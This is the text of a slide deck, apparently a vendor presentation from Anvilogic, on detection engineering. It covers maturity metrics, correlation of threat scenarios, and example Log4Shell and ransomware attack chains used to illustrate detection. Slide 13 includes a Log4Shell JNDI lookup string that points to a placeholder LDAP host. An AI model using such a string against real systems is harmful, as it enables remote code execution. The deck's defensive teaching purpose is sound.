  • 4. ANVILOGIC Inc. C O N F I D E N T I A L 4 Detection Engineering - The Current Way 1. Manual Research (ex. Google, Github) Identify Threat Research 48 hr 2. Track / Feedback (ex. JIRA) Create Ticket 1 hr 3. Develop, Test, Deploy (ex. SIEM) Build Test 4. Document Use Case (ex. Confluence) Runbook 3 hr Deploy 20 hr 5. Metrics & Reporting (ex. Qlikview) Maintain/Tune KPIs Disjoint People, Process, Technology Start End 3-5 Days Each 2-3+ Teams 5+ Tools x 3 Times = +15D Log4Shell Attack (3 Use Cases (exploit, .exe, C2)
  • 5. ANVILOGIC Inc. C O N F I D E N T I A L 5 1 Detection engineering is ● slow ● difficult ● results in noisy false positives delivered to the SOC 2 3 Bringing all data into a centralized SIEM data store is ● expensive ● difficult especially in hybrid cloud environments There is no good way to ● track MITRE ATT&CK technique coverage ● measure maturity progress in real time ● identify gaps and measure risk What are the problems with detection engineering today?
  • 6. ANVILOGIC Inc. C O N F I D E N T I A L How can we measure the effectiveness of our DE program? 6 Collection Detection Response • Data Coverage • Data Quality • Data Availability • Detection Coverage • Detection Quality • Lifecycle Management • Alert Management • Workflow • Speed • Accuracy Strategic Maturity How Are We Performing? How Can We Perform Better? Where Can We Perform Better? Organizational Risk? Industry-Specific Risk? Technology-Specific Risk? Communicating Value? Operational Maturity
  • 7. ANVILOGIC Inc. C O N F I D E N T I A L Typical vs. Ideal Detection → Pyramid of Pain Typical • IOC Driven • Very time limited • Lack of Context • Whack-a-mole Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html Ideal • Tool & Behavior Driven • Very hard for adversaries to change • Long term strategic value for detections
  • 8. ANVILOGIC Inc. C O N F I D E N T I A L Content 2.0 8 Events Events of Interest Alerts Traditional Alerts Threat Scenarios Risk Thresholds
  • 9. ANVILOGIC Inc. C O N F I D E N T I A L Threat Identifiers and Threat Scenarios 9 Threat Scenario Entity ‘X' Entity ‘X' Entity ‘X' + + Threat Identifier Event ID = “1234” AND (Process Name = “XYZ” OR Process Name = “ABC”) Events of Interest Event of Interest “A” AND (60 Minutes) Event of Interest “B” AND (5 hours) Event of Interest “C”
  • 10. ANVILOGIC Inc. C O N F I D E N T I A L Hunting Index - AKA: Events of Interest ● Correlating TTPs or Events of Interest
  • 11. ANVILOGIC Inc. C O N F I D E N T I A L Modern Security Operations 11 Hunt & Correlate Tag, Normalize, Enrich Case/Ticketing & SOAR Detection Engineering, Alerting, Triage, Hunting, and Response Across Modern Hybrid Data Environments Analyst Activity Triage Threat Scenarios Auto-Threat Detection No Code - Build Rules Detection Recommendations Security & IT Products (ex. EDR, AV, Cloud) Logs Logging Platforms (ex. Splunk, Snowflake, Azure) Query & Import API Query API Pull API Store Identifiers (EOIs)
  • 13. ANVILOGIC Inc. C O N F I D E N T I A L 13 Example: Log4Shell Attack Pattern Attacker Victim Security Operations Center Response {$jndi:ldap://1.2.3.4/Exploit} 1 2 java.exe <Payload Class> 3 Establish C2 Detection Engineers Research, Test, Document, Deploy Alert 3 1000s alerts Alert 1 Alert 2 SOC Triage 3-5 Days Build MITRE Attack Detections 1 2 3 + + Easy Correlation - No Code Required! Initial Access Execution C2 Workspace & Tasks Track Tune, Versions Test, Deploy Improve, Mature Maintain Research Exploit in Lab Develop, Test, Share Threat Research Reduce Alert Volume, Improve Dwell Time Attack Scenario 1 2 3 + + Triage Under 2 Hours Anvilogic Platform for Threat Detection, Investigation, and Response (TDIR)
  • 14. ANVILOGIC Inc. C O N F I D E N T I A L 1 4 Example: Ransomware Attack Pattern Start Windows Macro Execution An employee opens a malicious attachment that runs a macro Stage 1: Initial Access 1 Cobalt Strike Abnormal Web Connection Machine makes abnormal web connection to malware payload domain and establishes persistence +60m 3 Stage 3: Command & Control Stage 2: Installation Encoded PowerShell Command Macro spawns an encoded command in powershell +30s 2 Word Doc Last Chance to Detect! Stage 4: Discovery AD Find Execution Attacker uses adfind to gather active directory information for internal reconnaissance +60m Batch File </> 4 4 Rules 1 Correlation How Long? + = +
  • 15. ANVILOGIC Inc. C O N F I D E N T I A L 15 Anvilogic Impacts - 50B Financial Services +180 EDR RULES 111 CLOUD 97 ENDPOINT 31 WEB +403 CUSTOM 55 Azure Rules Improved by +31% 20 AWS Rules Improved by +75% 12 GCP Rules Improved by +17% 24 O365 Rules Improved by +21% 12 Proxy Rules Improved by +30% 19 Web App Rules Improved by +40% 55 Windows Rules Improved by +55% 42 Linux Rules Improved by +90% 180 EDR Rules Linux & Windows 51 SCENARIOS 239 IDENTIFIERS 17 MACROS 8.14M Warnings 300+ Identifiers 351 Alerts 10+ Scenarios 8.1T Raw Events 4,000+ Sourcetypes USE CASES 454 DEPLOYED 5.8 Alerts per day UPLOADS DOWNLOADS ~2m ● Increased Overall Detections by 91% ● Saved up to 6,500+ hours of engineering time Anvilogic Framework Impacts (60 Days)
  • 16. ANVILOGIC Inc. C O N F I D E N T I A L Key Takeaways & Next Steps ● Effective detection engineering requires good data, process, and measurement ● Not every detection requires an alert or action ● Build effective detections based on real-world attack scenarios and risk thresholds ● Pyramid of pain whitepaper https://www.anvilogic.com/learn/whitepaper- pyramid-apex ● Subscribe to our Threat Report anvilogic.com/resources/threat-report